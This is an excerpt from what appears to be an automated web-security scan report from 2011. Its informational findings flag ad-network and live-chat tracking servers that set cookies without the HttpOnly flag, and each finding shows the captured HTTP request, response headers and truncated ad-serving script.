GET /site=789981/size=728090/u=2/bnum=73612408/hr=13/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.imdb.com%252Fimages%252FSF99c7f777fc74f1d954417f99b985a4af%252Fa%252Fifb%252Fdoubleclick%252Fexpand.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=pH430013111733250028; aceRTB=rm%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Cam%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Cdc%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Can%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7Crub%3DFri%2C%2019%20Aug%202011%2014%3A48%3A39%20GMT%7C; A07L=3DM2reol9thECsRTmmuji_6yZBuTfBAd8OCZMhF9rk8jCf_-UPHfh8A; GUID=MTMxMzE5ODMwNTsxOjE3NGJrNzAwYWI2NjZtOjM2NQ; C2=BeTSOlLuFYRxG4Jq5EwFbZwaq+WAsVmRSjKOAMxWGRGtbLQtuaMGKMtrGDNZjMrxQLoIH0bSFl2moVmfzZUozS+B8pqRpVmfqaUoSK8BItdh4eQ3WXIuwaHCW8oxIBK9IU1IGCF; F1=BE4NJ5kAAAAA9iCDAEAAgEABAAAABAAAAEAAgEA; BASE=6cQnzlHYhoShvR1ceK3XL5aycYSYS86phwGH+KypTDXy5bPKnWShBX+I1kY4koT2wF0GVGuvu9AwwtMNvfiwMKCK3FXHo6CDdE4k8Ac0L0vPHOjgv1X3VKLkc5jIoT3KrQ0dlev7c4Q7TtKXkwoTyzZpoD5kIIWMw6pKXumJxaAylsrGPflwlzGZJOqJpfNI/gxASKU+TQ1nZ+L78EymLnA!; ROLL=jTgYEkXLjqa4aJBDIcb3d6zVdS4qvatzUjH3Pi0QjhhuPM9d8fW31EAB/MYISDOnqNIptoFV6jtmADHvDwkEA/5Fw5NB03P!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.973593.789981.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 15 Aug 2011 18:41:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:41:27 GMT
Content-Length: 1047
Connection: close
Set-Cookie: C2=XhWSOlLuFYRxGPJq5EwFbZwaq+WAsVmBIjKOAMxWGoFtbLQtuaoDKMtrGaMZjMrhGLoIH0bSF81moVmfzZwlzS+B8pqBfVmfqawlSK8BItdRueQ3WXkrwaHCW8oh+AK9IU1IGZE; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: F1=BcFaJ5kAAAAAd3ADAEAAgEgAAAAA9iCDAEAAODABAAAABAAAAIAAODA; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: BASE=6cQnylHYhoShvR1ceK3XL5aycYSYS86phwGH+KypTDXy5bPKnWShBX+I1kY4koT2wF0GVGuvu9AwwtMNvfiwMKCK3FXHo6CDdE4k8Ac0L0vPHOjgv1X3VKLkc5jIoT3KrQ0dlev7c4Q7TtKXkwoTyzZpoD5kIIWMw6pKXumJxaAylsrGPflwlzGZJOqJpfNI/gxASKU+TQ1nZ+L78EymLnAW4DkJw8N!; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: ROLL=jTgYEkXLjqa4aJBDIcb3d6zVdS4qvatvUjH3ic0QjhhuPM9d8fW31EAB/MYISDOnqNIptoFV6jtmADHvDwkEA/5Fw5NB03P!; domain=advertising.com; expires=Wed, 14-Aug-2013 18:41:26 GMT; path=/
Set-Cookie: 73612408=_4e496857,3023863148,789981^973593^65^0,0_; domain=advertising.com; path=/click

document.write('<iframe src="http://view.atdmt.com/CNT/iview/286710723/direct;wi.728;hi.90/01/3023863148?click=http://r1-ads.ace.advertising.com/click/site=0000789981/mnum=0000973593/cstr=73612408=_4e
...[SNIP]...

8.53. http://sales.liveperson.net/hc/76226072/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/76226072/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/76226072/?visitor=&msessionkey=&site=76226072&cmd=knockPage&page=http%3A//www.wireless.att.com/cell-phone-service/packages/free-packages.jsp%3Fsource%3DECWD000000000000O&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=1313432467768&javaSupport=true&id=5971605190&scriptVersion=1.1&d=1313432469797&title=Free%20Phone%20Deals%20and%20Packages%20-%20Shop%20-%20Wireless%20from%20AT%26T&referrer=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O
Cookie: LivePersonID=-546022977410-1313431914:-1:-1:-1:-1; HumanClickKEY=7991325949139639887; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1313431908597

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:22:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1313432576322; expires=Tue, 16-Aug-2011 18:22:56 GMT; path=/
Content-Type: image/gif
Last-Modified: Mon, 15 Aug 2011 18:22:56 GMT
Cache-Control: private
Set-Cookie: HumanClickSiteContainerID_76226072=Master; path=/hc/76226072
Set-Cookie: LivePersonID=-546022977410-1313431914:-1:-1:-1:-1; expires=Tue, 14-Aug-2012 18:22:56 GMT; path=/hc/76226072; domain=.liveperson.net
Content-Length: 34

GIF89aZ............,...........L.;

8.54. http://sales.liveperson.net/hc/76226072/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/76226072/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/76226072/?visitor=&msessionkey=&site=76226072&cmd=knockPage&page=http%3A//www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp&visitorStatus=INSITE_STATUS&activePlugin=none&pageWindowName=1313432467768&javaSupport=true&id=1570370816&scriptVersion=1.1&d=1313432494580&title=Windows%20Packages%20-%20Wireless%20from%20AT%26T&referrer=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp
Cookie: LivePersonID=-546022977410-1313431914:-1:-1:-1:-1; HumanClickKEY=7991325949139639887; HumanClickSiteContainerID_76226072=Master; LivePersonID=LP i=546022977410,d=1312768968; HumanClickACTIVE=1313432414672

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:22:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1313432576362; expires=Tue, 16-Aug-2011 18:22:56 GMT; path=/
Content-Type: image/gif
Last-Modified: Mon, 15 Aug 2011 18:22:56 GMT
Cache-Control: private
Set-Cookie: HumanClickSiteContainerID_76226072=Master; path=/hc/76226072
Set-Cookie: LivePersonID=-546022977410-1313431914:-1:-1:-1:-1; expires=Tue, 14-Aug-2012 18:22:56 GMT; path=/hc/76226072; domain=.liveperson.net
Content-Length: 34

GIF89aZ............,...........L.;

8.55. http://segment-pixel.invitemedia.com/set_partner_uid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=191&sscs_active=1&partnerUID=2865308626608336017 HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=64&exchange_id=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=aec68995-e6c4-4c62-92ef-0b6b1fb1c15f; uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1; exchange_uid="eyIyIjogWyIzNTM5NjU2OTQ2OTMxNTYwNjk2IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFSkYxUkRIYVhLUk43UTQ3eUpPVXdMayIsIDczNDM0MF0sICI3IjogWyIxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYiLCA3MzQzNjRdfQ=="; partnerUID=eyIxMTUiOiBbIjRlMzcxMDA1OGNmNzZjOTAiLCB0cnVlXSwgIjE1IjogWyIwMDMwMDEwMDIxOTAwMDAwNzk3NDAiLCB0cnVlXSwgIjg0IjogWyJIaTFIMWh6OTk5OTNlSDJtIiwgdHJ1ZV19; segments_p1="eJzjYubYyMPFxbH/ALPAi2nHPrEA2Sd7mARerN0GZLNwdHYwczFzHGfk4uSYHiBw79iEzywAncMQww=="; __utma=140145771.1424462457.1313432170.1313432170.1313432170.1; __utmb=140145771.4.10.1313432170; __utmz=140145771.1313432170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dp_rec="{\"1\": 1313426619+ \"2\": 1313426607+ \"5\": 1313432697+ \"4\": 1313426573}"; subID="{}"; impressions="{\"769846\": [1312767370+ \"dffe82cd-ff8c-4145-a734-bdd8d42b5cc7\"+ 69905+ 29809+ 1365]+ \"748419\": [1312767414+ \"c293e3f7-1374-398b-ad44-93d92a9ce4be\"+ 219708+ 61959+ 12050]+ \"728928\": [1313426607+ \"c4c0133b-0eac-475e-83d5-75db053b7608\"+ 70238+ 29835+ 1209]+ \"718819\": [1313102115+ \"08dcd5d0-76e4-4739-88e9-ffac3e204fc4\"+ 69900+ 29809+ 1365]+ \"799461\": [1313426618+ \"98F18B32-A1BA-4442-B3D4-AC0B1190E029\"+ 69861+ 29806+ 1209]+ \"728904\": [1313432697+ \"9438D1EC-137A-41B9-A85A-FC3DB1591307\"+ 70251+ 29836+ 1209]}"; camp_freq_p1="eJzjkuG4dJdZgEni54mln1gUGDW2ngTSBkwWvTOBNJcMx+sJbAKMErtmQmR33V8PlGW0APO5JDjOrGMByq4HyzJoMABlwGwuEY5Vx0H6Fm+aCJVhsGAAina9Aolu+/3nI7JodzM70AVdyKIA+Sgw2A=="; io_freq_p1="eJzjEufY4yLALPHzxNJPLAoMGgwGzBa9M4FsLnGOSfECjBK7ZsIkGC3AbC5hjqnJQB2LN02ESjBYMAAFJ6cBVW/7/ecjXBAABE8aYg=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 15 Aug 2011 18:26:33 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 15-Aug-2011 18:26:13 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyIxMTUiOiBbIjRlMzcxMDA1OGNmNzZjOTAiLCB0cnVlXSwgIjE5MSI6IFsiMjg2NTMwODYyNjYwODMzNjAxNyIsIHRydWVdLCAiMTUiOiBbIjAwMzAwMTAwMjE5MDAwMDA3OTc0MCIsIHRydWVdLCAiODQiOiBbIkhpMUgxaHo5OTk5M2VIMm0iLCB0cnVlXX0="; Domain=invitemedia.com; expires=Tue, 14-Aug-2012 18:26:33 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

8.56. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=28134&adId=23480&kadwidth=728&kadheight=90&kbgColor=FFFFFF&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c&frameName=http_ad_doubleclick_netadiamzn_us_house_redirect;cid=pubmatic728;sz=728x90;click=http_bes-clck_comckomli_ads_frame12527328134&kltstamp=2011-7-15%2013%3A26%3A1&ranreq=0.7707217440474778&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k38yjeHuSHI.bTJW0F8Dg.lsVtPmkXIkrDvUMvsBepdbMb2ghwXlkru9AXPlHpDh3AGFy7-9MamUXS1Tr7vcmFnolYkGkL57fFK16oAXEKpCKpXcQ1eEeOYDrWE2llnVp6NxfC9gjGXECHbqbKdfOR4W5pWS3rcbviAQY.Igkazish0RgA7LHICD7p4qn-Tru1g7JM4fmecNCl6Npzuo6AuCnMCK6R4m7rKoqSDQ9Gkf3EZoy6QHXeRdFpo95-hiX1C9G8pJRsu8Fp6ZteAeKisiBmB74iMGUWGrah6XW.ZJDTKTQxQhko5X9EM1Oa8-.iBSicVnbtYQ9ait5Dn-YTEFyZnCYtfUfXf9zFfSEFBpO03suLL9pqQrZ.yPdj7Vob1aS6PK7Rz5sf0iu3Qrn4mv2.cpSP7BomB8.h08ZhdCEsUwfYSc96kHdEjUXzR1tVBiwV1v4xdxmYQQkw8r8z0lh-uT1kJQV0aRH9qsW2jEF17Dev9Ywuhsc.h0a7FWcsNTtsxKJ6JifJjW2zg3jpTc9fDaHDpzVElI51j-BRyXBFXF2RayGvWR0e8O1yqI5oa9NvPbS-9CplZHeUV1cXCv0lqVKT1sPyXU5tiwJtw0GXQtdQVHKBae4OFtZ2oITbUYAl3wNrulDLb2LC5.FmjL4dBOfZe9xl8H3Y7e-DR5uQ0FCTupDmD2IQCgxZs4E-pKqkXGMOGATFnu5gpufNXilJXNDzTuXcAQjDEq-tdWU7CpQti0E7AOVccWwMf1V0GY891kDHcdd7pJLtl9aw0_&d=;ord=4,525,044,809,135,282,754?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubfreq_28134=; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; PUBMDCID=1; pubfreq_25281=; pubtime_25281=TMC; _curtime=1313432692; pubfreq_25281_19972_345442688=243-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; KTPCACOOKIE=YES; KRTBCOOKIE_58=1344-CM-00000001429329761; KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; KRTBCOOKIE_107=1471-uid:8413bde9-2099-43af-b214-8fee85ef2861; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 15 Aug 2011 18:26:23 GMT
Content-Length: 1747
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:26:23 GMT; path=/
Set-Cookie: _curtime=1313432783; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:36:23 GMT; path=/
Set-Cookie: pubfreq_28134_23480_2032421322=243-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:06:23 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:26:23 GMT; path=/

document.write('<div id="http_ad_doubleclick_netadiamzn_us_house_redirect;cid" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAOZtAAC4WwAA3
...[SNIP]...

8.57. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25281&adId=19972&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281&kltstamp=2011-7-15%2013%3A42%3A18&ranreq=0.9575279243290424&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; pubtime_25281=TMC; KRTBCOOKIE_58=1344-CM-00000001429329761; KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; KRTBCOOKIE_107=1471-uid:8413bde9-2099-43af-b214-8fee85ef2861; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699; PUBMDCID=1; _curtime=1313432705; PMDTSHR=cat:; KTPCACOOKIE=YES; pubfreq_25281=243-1; pubfreq_28134=243-1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1645
Date: Mon, 15 Aug 2011 18:41:24 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:41:24 GMT; path=/
Set-Cookie: _curtime=1313433684; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:51:24 GMT; path=/
Set-Cookie: pubfreq_25281_19972_471124789=243-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:21:24 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:41:24 GMT; path=/

document.write('<div id="http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAMFiAAAET
...[SNIP]...

8.58. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25281&adId=19972&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281&kltstamp=2011-7-15%2013%3A25%3A48&ranreq=0.6436679325997829&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; PUBMDCID=1; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubfreq_28134=; pubtime_28134=TMC; PMDTSHR=cat:; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1723
Date: Mon, 15 Aug 2011 18:26:04 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:26:03 GMT; path=/
Set-Cookie: pubfreq_25281_19972_1780682826=661-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:06:04 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:26:04 GMT; path=/

document.write('<div id="http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAMFiAAAET
...[SNIP]...

8.59. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=28134&adId=23480&kadwidth=728&kadheight=90&kbgColor=FFFFFF&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c&frameName=http_ad_doubleclick_netadiamzn_us_house_redirect;cid=pubmatic728;sz=728x90;click=http_bes-clck_comckomli_ads_frame12527328134&kltstamp=2011-7-15%2013%3A42%3A31&ranreq=0.3122092674020678&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/amzn.us.house.redirect/;cid=pubmatic728;sz=728x90;click=http://bes-clck.com/c?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8k4x37jEk4RaM-N8KDx421NWuVh1ZLgoWWQudchlsYe5PcYVx2vbYbMtiPq.n2CeWRJTesz5yQXOzCjMZdwAqFyNnOTDtle2VKarcPdz88rH7iZ4jU385oUFDGoP3B6CEgPfX-otWguyL8aLzO9ioQoQtsmg4qcQcLxvJBuEpl1v7hKW1aowqFQgF7-KMC5K7DYpqQ6eqdslCKCQ6UQp23npKU1ShkeJA0YMpBtua2bVx9N40ht7Hgq2VML1B9jJizHu2FsiDsM3LkpS0axGEVF8VLaQGabLzvynjmtHTihkVMdXx-Q4x95mRrhE4VA-oErYpUO6O1vKfYW.pu.DVo-Czk3DMb4zSHlKxsRX7z--ZgBxywhRwp.PHhx6MFPrtOjuURFhyrJtRNOW.5aKDskuV6ohO58ZliicCAHfdh5DXdqa3OZ1F.9UgE6eGvjfYnAD-I5M924P1kz61RknTiwRKE9uMOryQSvalvqxCLLOnMmnndI-6sIIzjFVsodfUqiBrgyrTSpm4JsM6ic6ZFBjMxbXFYK.W2.lKz.AYe0Df12OrJJlE-k7taCg6sQ7xzi.apVxrQZYQ8E2uaxDjsvmDxAOvla83JBLXcwRIeWo7BpqzXHOQr2E6mzLmYvJnC5E62BTPrGShN73Xe-UQYawjRsteukCzFee0cootJRWBeFNZzqmN0bXcwwmiRIwGr5e7GV4gKUldeRFfHL59FWd0q2zBsMCNmnszuiyP37tJE5W86gx20gqzoXJC-VG.OPL8vKg2KrP9SZEdXba1PBE_&d=;ord=865,485,605,004,109,273?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
